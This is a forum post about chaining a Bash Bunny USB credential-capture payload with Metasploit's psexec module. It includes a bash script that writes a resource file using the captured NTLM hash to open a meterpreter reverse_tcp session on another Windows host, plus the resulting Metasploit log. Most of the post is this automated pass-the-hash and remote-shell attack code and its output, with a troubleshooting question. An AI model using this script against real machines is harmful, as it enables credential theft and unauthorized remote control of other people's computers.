Jump to content

msfconsole psexec and BB


Recommended Posts

This is not a 100% BashBunny topic, but it is related and I think all the newbies like me could be interested.

I 've used Metasploit in a Kali laptop with a post mimikatz module loaded and dump  NTLMv2 hashes fine. Takes a Superuser account hash, and use  exploit/windows/smb/psexec for accessing other computers on the same network.

Then I realize I can setup msf on my BB.

Running V1.3 on my BB, I setup Metasploit following this guide :


First, it melt my brain as it didn't work and I am not super skilled on this matters, but after some Gems uninstall/install/downgrade I finally make it works.

Then I used the  quickcreds payload for getting the hashes through the USB and when that is done, I build a RC file that it pass to the msfconsole -r.

So far so good.

Metasploit takes like 1 minute to load, but it works. The problem is when it try to exploit it, I always get Login Error : execution expired

The main question is: are the hashes on hashdump  somehow different than the hashes that quickcreds provides? (I hope that don't sounds too newbie)

Or anyone see anything bad on what I am doing here?


This is the log I got from metasploit :

       =[ metasploit v4.15.7-dev-70a82b5                  ]
+ -- --=[ 1674 exploits - 960 auxiliary - 295 post        ]
+ -- --=[ 489 payloads - 40 encoders - 9 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

[*] Processing /root/udisk/loot/quickcreds/LAPTOP1/conf.txt for ERB directives.
resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> use exploit/windows/smb/psexec
resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> set LHOST
resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> set LPORT 443
LPORT => 443
resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> set RHOST
resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> set SMBUser myusername
SMBUser => myusername
resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> set SMBPass df201f7e84ef06aa:7C3A900BB41C05C66F3BE717CF1F8FCB
SMBPass => df201f7e84ef06aa:7C3A900BB41C05C66F3BE717CF1F8FCB
resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> set SMBDomain OFFICEDOMAIN
resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> exploit -j
[*] Exploit running as background job.
resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> sleep 20
[*] Started reverse TCP handler on
[*] - Connecting to the server...
[*] - Authenticating to|OFFICEDOMAIN as user 'myusername'...
[-] - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: execution expired


This is what I added to the payload to test it (ugly code, it is just a test):

echo "use exploit/windows/smb/psexec" > $LOOTDIR/$HOST-$COUNT/conf.txt
echo "set payload windows/meterpreter/reverse_tcp" >> $LOOTDIR/$HOST-$COUNT/conf.txt
echo "set LHOST" >> $LOOTDIR/$HOST-$COUNT/conf.txt
echo "set LPORT 443" >> $LOOTDIR/$HOST-$COUNT/conf.txt
echo "set RHOST ${TARGET_IP}" >> $LOOTDIR/$HOST-$COUNT/conf.txt
head -1 /root/loot/quickcreds/$HOST-$COUNT/*NTLM* |awk -F':' '{print "set SMBUser "$1}' >> $LOOTDIR/$HOST-$COUNT/conf.txt
head -1 /root/loot/quickcreds/$HOST-$COUNT/*NTLM* |awk -F':' '{print "set SMBPass "$4":"$5}' >> $LOOTDIR/$HOST-$COUNT/conf.txt
head -1 /root/loot/quickcreds/$HOST-$COUNT/*NTLM* |awk -F':' '{print "set SMBDomain "$3}' >> $LOOTDIR/$HOST-$COUNT/conf.txt

echo "exploit -j" >> $LOOTDIR/$HOST-$COUNT/conf.txt
export HOME=/root
source /etc/profile.d/rvm.sh
cd /root/metasploit-framework/
./msfconsole -r $LOOTDIR/$HOST-$COUNT/conf.txt &>> /root/msf.log


Link to comment
Share on other sites


This topic is now archived and is closed to further replies.

  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...